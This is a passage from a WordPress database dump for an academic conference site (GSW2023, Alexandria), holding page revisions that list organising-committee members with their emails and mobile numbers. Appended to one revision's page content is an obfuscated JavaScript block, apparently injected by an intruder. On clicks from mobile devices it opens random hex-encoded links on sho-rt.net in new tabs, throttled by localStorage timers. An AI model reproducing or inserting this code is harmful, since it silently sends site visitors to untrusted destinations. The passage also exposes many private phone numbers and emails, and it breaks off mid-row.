12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"106\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5159\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"133\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Mohamed ElQurashi</strong></em></span>\r\n<span style=\"font-size: 12pt;\">m.elqurashi@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201003348433</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Security Engineer</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-09-05 15:53:12','2023-09-05 15:53:12','',4849,'https://gsw2023.com/?p=5461',0,'revision','',0),
(5462,1,'2023-09-06 05:48:03','2023-09-06 05:48:03','','IMG-20230905-WA0015','','inherit','open','closed','','img-20230905-wa0015','','','2023-09-06 05:48:03','2023-09-06 05:48:03','',0,'https://gsw2023.com/wp-content/uploads/2023/09/IMG-20230905-WA0015.jpg',0,'attachment','image/jpeg',0),
(5463,1,'2023-09-06 06:10:51','2023-09-06 06:10:51','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"106\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column 